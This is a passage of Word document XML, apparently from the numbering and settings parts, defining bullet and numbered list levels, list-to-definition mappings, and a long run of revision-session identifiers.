      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="39E0AF2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="68947F26">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="6B8E92AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E8B066CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="3000ECAC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="11AAF546">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="61" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="71AB0BEC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="00E46DE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B5B68BD6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="2AD453F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="657E25AC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="B7EC90BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="B9B4C07E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5D2CDD88">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="6E201E44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="56B4BE70">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="62" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7222501C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="7E947996">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="E6084258">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A5C8649A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="C5027E82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BE3CA758">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="5F1C390E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="35BCE5AA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="492EC614">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="5FBAEB84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="63" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="722AC654"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="BE78AB72">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BE34545E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="0A9672A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="EAA0AC2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6F78B1A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="9A2E3D0A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="F7A41340">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D5885C80">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="22069468">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="64" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="770A7B2D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="6EDA039E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1CE01B3A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="C69AA8BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="95567510">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7AA2F90C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E1062230">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="00C83E44">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Symbol" w:hAnsi="Symbol"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="2CA03BAE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Courier New" w:hAnsi="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FE8C07E2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="65" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D796C75"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4692DA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7EB77ECF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="64603A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7FFC4073"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5FE407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650980672">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1989937958">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1154493370">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1709258044">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="97259989">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="662666569">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="681787627">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="784470436">
    <w:abstractNumId w:val="56"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1292596974">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="567494771">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1768579307">
    <w:abstractNumId w:val="60"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="170881309">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1022701679">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="176624869">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="512844785">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1218936518">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="185146150">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="852300096">
    <w:abstractNumId w:val="50"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="146213729">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="808664963">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1391349151">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="885946562">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="355927990">
    <w:abstractNumId w:val="55"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="93795466">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="162551279">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="839272258">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1468089633">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1553539215">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="828904221">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1377239065">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="1134566284">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="2060085752">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="2060275102">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="767972106">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1432235567">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1046486317">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="1581719162">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="414058595">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1995719670">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="735934733">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="660040816">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="240452261">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="529994128">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="1775859732">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1804762688">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="404374208">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1800148942">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="927348632">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="49" w16cid:durableId="2056006141">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="50" w16cid:durableId="908418012">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="51" w16cid:durableId="1624069794">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="52" w16cid:durableId="704208339">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="53" w16cid:durableId="15008556">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="54" w16cid:durableId="1418287343">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="55" w16cid:durableId="1124081250">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="56" w16cid:durableId="123230278">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="57" w16cid:durableId="782189593">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="58" w16cid:durableId="2561602">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="59" w16cid:durableId="527525763">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="60" w16cid:durableId="1676955822">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="61" w16cid:durableId="1483501213">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="62" w16cid:durableId="1300693300">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="63" w16cid:durableId="1456634347">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="64" w16cid:durableId="507139936">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="65" w16cid:durableId="1754082865">
    <w:abstractNumId w:val="51"/>
  </w:num>
  <w:num w:numId="66" w16cid:durableId="39481915">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="67" w16cid:durableId="308559017">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="68" w16cid:durableId="403531426">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:numIdMacAtCleanup w:val="6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val="false"/>
  <w:defaultTabStop w:val="720"/>
  <w:hyphenationZone w:val="916"/>
  <w:doNotHyphenateCaps/>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numFmt w:val="decimal"/>
    <w:endnote w:id="-1"/>
    <w:endnote w:id="0"/>
    <w:endnote w:id="1"/>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zU0MDYzsjQ0tLQwNTNV0lEKTi0uzszPAykwqgUAcs7WjywAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="006627BE"/>
    <w:rsid w:val="00000E6A"/>
    <w:rsid w:val="000019E0"/>
    <w:rsid w:val="00001B3E"/>
    <w:rsid w:val="000028D3"/>
    <w:rsid w:val="0000586C"/>
    <w:rsid w:val="0000625E"/>
    <w:rsid w:val="00006886"/>
    <w:rsid w:val="00006E3F"/>
    <w:rsid w:val="00006F97"/>
    <w:rsid w:val="0001139F"/>
    <w:rsid w:val="000153F8"/>
    <w:rsid w:val="000209EA"/>
    <w:rsid w:val="00021BBF"/>
    <w:rsid w:val="00021D3F"/>
    <w:rsid w:val="00022867"/>
    <w:rsid w:val="0002287C"/>
    <w:rsid w:val="00023009"/>
    <w:rsid w:val="000235BD"/>
    <w:rsid w:val="00023A56"/>
    <w:rsid w:val="000242A0"/>
    <w:rsid w:val="00025AB0"/>
    <w:rsid w:val="000267BB"/>
    <w:rsid w:val="000313DD"/>
    <w:rsid w:val="00033146"/>
    <w:rsid w:val="00033B74"/>
    <w:rsid w:val="000374CC"/>
    <w:rsid w:val="000402B3"/>
    <w:rsid w:val="000403D6"/>
    <w:rsid w:val="000414B9"/>
    <w:rsid w:val="000414F5"/>
    <w:rsid w:val="00043D4A"/>
    <w:rsid w:val="000466CA"/>
    <w:rsid w:val="00046DFA"/>
    <w:rsid w:val="00047857"/>
    <w:rsid w:val="00050335"/>
    <w:rsid w:val="00050357"/>
    <w:rsid w:val="00051CBF"/>
    <w:rsid w:val="00052BA2"/>
    <w:rsid w:val="00054061"/>
    <w:rsid w:val="0005427B"/>
    <w:rsid w:val="00054696"/>
    <w:rsid w:val="00055A24"/>
    <w:rsid w:val="00056C14"/>
    <w:rsid w:val="000603BD"/>
    <w:rsid w:val="000614C0"/>
    <w:rsid w:val="00062CD9"/>
    <w:rsid w:val="000642B2"/>
    <w:rsid w:val="000647F0"/>
    <w:rsid w:val="000654D9"/>
    <w:rsid w:val="000665D2"/>
    <w:rsid w:val="00067F62"/>
    <w:rsid w:val="000721C0"/>
    <w:rsid w:val="00072215"/>
    <w:rsid w:val="00072416"/>
    <w:rsid w:val="00072525"/>
    <w:rsid w:val="00074892"/>
    <w:rsid w:val="00074A28"/>
    <w:rsid w:val="00075725"/>
    <w:rsid w:val="00076776"/>
    <w:rsid w:val="00077A27"/>
    <w:rsid w:val="00080400"/>
    <w:rsid w:val="000804B8"/>
    <w:rsid w:val="000807F0"/>
    <w:rsid w:val="00080DEE"/>
    <w:rsid w:val="000818FE"/>
    <w:rsid w:val="00082674"/>
    <w:rsid w:val="00082698"/>
    <w:rsid w:val="00082735"/>
    <w:rsid w:val="0008376D"/>
    <w:rsid w:val="00085233"/>
    <w:rsid w:val="00085CA0"/>
    <w:rsid w:val="00086557"/>
    <w:rsid w:val="000878F4"/>
    <w:rsid w:val="00090333"/>
    <w:rsid w:val="00090B42"/>
    <w:rsid w:val="00090EE1"/>
    <w:rsid w:val="00093098"/>
    <w:rsid w:val="000937E7"/>
    <w:rsid w:val="00093925"/>
    <w:rsid w:val="00094979"/>
    <w:rsid w:val="00094DDF"/>
    <w:rsid w:val="00095913"/>
    <w:rsid w:val="00095E55"/>
    <w:rsid w:val="000A1965"/>
    <w:rsid w:val="000A1BE6"/>
    <w:rsid w:val="000A5579"/>
    <w:rsid w:val="000A6181"/>
    <w:rsid w:val="000A7577"/>
    <w:rsid w:val="000A7D4F"/>
    <w:rsid w:val="000A7FE4"/>
    <w:rsid w:val="000B0270"/>
    <w:rsid w:val="000B0A8F"/>
    <w:rsid w:val="000B117F"/>
    <w:rsid w:val="000B2BB7"/>
    <w:rsid w:val="000B32C0"/>
    <w:rsid w:val="000B3B9B"/>
    <w:rsid w:val="000B5A32"/>
    <w:rsid w:val="000B62FA"/>
    <w:rsid w:val="000B6F46"/>
    <w:rsid w:val="000B6FCD"/>
    <w:rsid w:val="000B7D62"/>
    <w:rsid w:val="000C00B7"/>
    <w:rsid w:val="000C01E2"/>
    <w:rsid w:val="000C051C"/>
    <w:rsid w:val="000C0531"/>
    <w:rsid w:val="000C2971"/>
    <w:rsid w:val="000C29F4"/>
    <w:rsid w:val="000C3E03"/>
    <w:rsid w:val="000C41A4"/>
    <w:rsid w:val="000C4497"/>
    <w:rsid w:val="000C45D7"/>
